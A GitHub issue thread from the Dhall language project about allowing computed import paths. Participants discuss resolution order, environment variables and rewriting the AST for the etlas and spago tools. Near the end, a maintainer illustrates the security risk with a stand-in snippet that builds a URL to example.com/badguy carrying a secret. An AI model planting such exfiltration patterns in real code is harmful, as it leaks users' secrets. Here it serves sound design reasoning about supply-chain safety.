### ISSUE TITLE
Allow computed quoted path components for (at least local) imports

### ISSUE THREAD

**Issue by jneira** [dhall-lang/dhall-lang#378]
Hi, i've revised the previous issues about and i've found [this](https://github.com/dhall-lang/dhall-lang/issues/187#issuecomment-404578093):

>There are two issues to supporting the general case of computed imports:
>* One is the security risk since this can be used to exfiltrate sensitive program state
>* The second reason is that import resolution precedes normalization which prevents this sort of computed import (with caveats; see below)

and a possible solution

> In principle, we could also add something similar to using for computing the path. i.e. something like `http://example.com path ./path.dhall` analogous to `using`

However i think it would be very useful to allow the last one, at least for local imports (if we want to avoid insecure http imports) to let users something like:

```
let my-import = /"${env:MY_ENV_VAR as Text}"/my-dhall-file.dhall
```
being MY_ENV_VAR=whatever/path

or simply

```
let my-path="my/path"
let my-import=/"${my-path}"/my-file.dhall
```

**Comment by f-f** [comment]
The main reason why this is hard is because as you mentioned, the order of the compiler phases doesn't help us here (resolution comes before normalization).
To solve that we could do multiple passes, which I feel it might get hairy pretty quickly from the implementors point of view, and confusing from the user point of view (e.g. "how many passes does the interpreter do here? And do I need to care?")

A possible 80% solution could be to use the pattern I described in https://github.com/dhall-lang/dhall-lang/issues/169#issuecomment-414916674, so doing "multiple passes" by generating more Dhall at every pass.
The reason why this is more viable is that we now have `Text/show`, so it should be possible to build a Dhall renderer in pure Dhall, avoiding the need for the string-concatenation-by-hand I did above.

So your example would be something like:
```haskell
-- this is import.dhall
let Dhall = https://prelude.dhall-lang.org/Dhall/package.dhall
let my-path = "my/path"
Dhall.let "my-import" ("/" ++ (Dhall.interpolate my-path) ++ "/my-file.dhall")
```

And then you'd do
```
$ dhall <<< "https://prelude.dhall-lang.org/Dhall/render ./import.dhall" > ./templated-import
$ dhall <<< "./rest-of-my-code ./templated-import"
```

**Comment by jneira** [comment]
@f-f thanks! I am afraid that, in our actual use case, we wouldn't want to make final users of `etlas` have to preprocess the `etlas.dhall` file if possible (ideally they even should be able to not use directly the dhall executable).

Maybe the possible solution pointed out by @Gabriel439 (`http://example.com path ./path.dhall`) could be done avoiding multiple passes?. In fact the headers with `using` are "compiled" before the import resolution, right?

**Comment by f-f** [comment]
@jneira could you detail some more about your current use-case in `etlas`?

Re multiple passes: yes, the headers are the only exception to the single pass, and effectively a get a "preliminary pass" (but the amount of additional passes is not limited to 1, e.g. if your headers import references an import with headers you'd get another pass, and so on)
Another note to this is that if we went for doing this for other import types, we'd have to specify an import that contains the parametrization (so that the "import parametrization" would be closed and not able to refer to variables in context - Gabriel's idea in the linked comment above already entails this), so the user wouldn't have only one dhall file anymore

**Comment by jneira** [comment]
> so the user wouldn't have only one dhall file anymore

oh, i see

> @jneira could you detail some more about the use-case in `etlas`?

Sure! We are thinking in download a dhall file with the list of default dependencies (and as part of the general `etlas update` command). Ideally this file would be inside the user etlas directory (like the rest of them). 
So if we want to refer that file from the `etlas.dhall`  project files we could use:
```
let dependencies = ~
                     /.etlas/subfolder/dependencies.dhall -- for linux
                 ?  ~/AppData/Roaming/etlas/subfolder/dependencies.dhall -- for *some* versions of windows :-(
                 ? https://etlas.org/subfolder/dependencies.dhall
```
But users, as usual, can change the `etlas` user data dir with an env var `$ETLAS_CONFIG` so the verbose approximation cant cover all cases.

Another goal is not use any magic in the haskell part that makes `etlas dhall` no usable directly with common dhall executables (if users want to use them!). Maybe it is asking too much 😆

**Comment by f-f** [comment]
@jneira oh I see, so this is why being able to parametrize the path by the `$ETLAS_CONFIG` could be handy.

This reminds me of a feature we just added to [spago](https://github.com/spacchetti/spago), in which we have to manipulate an import for the user: basically they keep in their Dhall file an http import that points to the "package-set" they are using, and they can run a command to "upgrade" this pointer to the latest release of it.
To implement that feature we basically walk the Dhall AST, find the import and replace the URL with the new one (for more detail, docs for the feature [are here](https://github.com/spacchetti/spago#upgrading-the-package-set) and [implementation is here](https://github.com/spacchetti/spago/blob/master/app/Spago/PackageSet.hs#L168))

So I wonder if Etlas could do something similar here?

E.g.:
- You keep in the `etlas.dhall` the default values as you listed them in the snippet above
- `etlas update` checks the value of the `$ETLAS_CONFIG` var
- if the value is not the default one:
  - warn the user about "hey I'm not doing what the config file says and doing other stuff instead"
  - walk the AST, find the `let dependencies = ..` and replace the paths with the correct ones
- evaluate the new AST

Would this work?

(The idea has one caveat: since you're manipulating the unevaluated AST, it has to be *exactly* the one you want or the pattern matching will fail - see the spago code I linked. I wonder if we can do anything about this e.g. with lenses - right now manipulating dhall-haskell AST is pretty hard, or I'm doing it wrong)

**Comment by jneira** [comment]
> To implement that feature we basically walk the Dhall AST, find the import and replace the URL with the new one (for more detail, docs for the feature [are here](https://github.com/spacchetti/spago#upgrading-the-package-set) and [implementation is here](https://github.com/spacchetti/spago/blob/master/app/Spago/PackageSet.hs#L168))

Yeah, i was thinking in somethink like that : decouple actual URL from the location and transform them in URI ( like xml namespaces). Then map each unique uri (or canonical local path) to the real location, that can be the cached version, a local file or a remote redirection. Keeping the real file in the explicit url of course.
So you can has the clean url that can be used as unique identifier
```
let deps = https://etlas.org/subfolder/dependencies.dhall 
```
and let the tool make the dirty word to find the real file.

**Comment by jneira** [comment]
But it has its own caveats (you have to go down to dhall internals and keep in sync the remote and derived archive), i somewhat like the explicitness and self-containment of raw dhall files without any postprocessing However i agree that put the responsability in dhall itself makes it too much complex and the `path` alternative would not work in this case so closing this. 
@f-f thanks for the points and suggestions!

**Comment by f-f** [comment]
You're welcome! 🙂

**Comment by Gabriel439** [comment]
Sorry that I took so long to respond, but I wanted to think a bit before commenting and I think there's a simpler solution: have Etlas provide the desired computed path through something like an `ETLAS_DHALL` environment variable.

In other words, you would define `dependencies` as:

```bash
let dependencies = env:ETLAS_DHALL

…
```

... and then when `etlas` runs Dhall it provides the correct computed path to the dependencies like this:

```bash
$ ETLAS_DHALL="/computed/path/to/dependencies.dhall" dhall <<< './exampleProject.dhall'
```

Then the configuration would be compatible with the standard Dhall tooling (so long as the user defined the necessary `ETLAS_DHALL` environment variable

**Comment by jneira** [comment]
Mmm, interesting, but we can get the same effect using the url as uri and replace the uri with the local file in etlas as [commented](https://github.com/dhall-lang/dhall-lang/issues/378#issuecomment-465432402), no?. 
When etlas finds out an import with the url (without hash!)
```
let x = https://etlas.org/subfolder/dependencies.dhall
```
it will replace with
```
let x =./etlas/local/path/dependencies.dhall actual_hash
```
(tha can be generalized using a map between uris and actual locations, a map that could be a dhall record! That is the way xml namespaces work)
This way, the dhall file will continue to be self-contained cause the url points to the actual archive (although it will be slow) and etlas will use the local version, without using an env var.

**Comment by Gabriel439** [comment]
@jneira: Ah, I get it now.  The part that I missed is that the local path that Eta replaces the remote import with is related to the import itself.  So Eta can't use the environment variable solution because it doesn't know what new local import to supply without access to the original remote import.

**Comment by masaeedu** [comment]
I'm working with a Dhall file for Spago and have this:

```
let additions =
  { record-optics-extra =
    let version = "eb48939dc480e52afc9af705d25e70405ffc50b3"
    let org = "masaeedu"
    let repo = "purescript-record-optics-extra"
    let manifest = https://raw.githubusercontent.com/masaeedu/purescript-record-optics-extra/eb48939dc480e52afc9af705d25e70405ffc50b3/spago.dhall
    in
    { dependencies = manifest.dependencies
    , repo = "https://github.com/${org}/${repo}.git"
    , version = version
    }
  , snap =
    let version = "f0ce697b82fa2647bb92b11b0c54a91b27bad79d"
    let org = "jlavelle"
    let repo = "purescript-snap"
    let manifest = https://raw.githubusercontent.com/jlavelle/purescript-snap/f0ce697b82fa2647bb92b11b0c54a91b27bad79d/spago.dhall
    in
    { dependencies = manifest.dependencies
    , repo = "https://github.com/${org}/${repo}.git"
    , version = version
    }
  }
```

which I'd really like to pull out into a reusable function. I don't see a way to deal with this problem using environment variables.

**Comment by Gabriel439** [comment]
@masaeedu: I think this still may be fixable according to this comment I made in another thread:

https://github.com/dhall-lang/dhall-lang/issues/187#issuecomment-404578093

In other words, you could do something like:

```
https://github.com path [ org, "${repo}.git" ]
```

... where the argument to the new `path` keyword would not have access to any values in scope (similar to how `using` currently works)

**Comment by Gabriel439** [comment]
Actually, I just realized that my proposal wouldn't fix your problem, because you would like the path to be able to access variables in scope (e.g. `org` and `repo`)

**Comment by masaeedu** [comment]
@Gabriel439 That's right. Could you elaborate on why using computed import paths with a static (uncomputed) hash would be a security issue?

**Comment by Gabriel439** [comment]
@masaeedu: An example would be if you imported an expression like this one:

```dhall
\(secret : Text) -> let _ = "https://example.com/badguy?secret=${secret}" in …
```

**Comment by masaeedu** [comment]
@Gabriel439 Right, but I don't follow why this is different from just doing `let _ = https://example.com"/badguy?secret=imnotwearinganyunderpants` and sending a literal secret to a nefarious party. As long as the imported expression isn't able to implicitly access things in scope that I didn't explicitly send to it, isn't that fine?

**Comment by Gabriel439** [comment]
@masaeedu: You might not be the one who authored that malicious expression.

You can safely police code that you personally author, but we can't expect users to audit all of their transitive dependencies to ensure that nothing attempts to exfiltrate sensitive secrets

This isn't a theoretical concern: the NPM package repository has been attacked in this way where packages deep in the dependency tree started harvesting people's secret keys
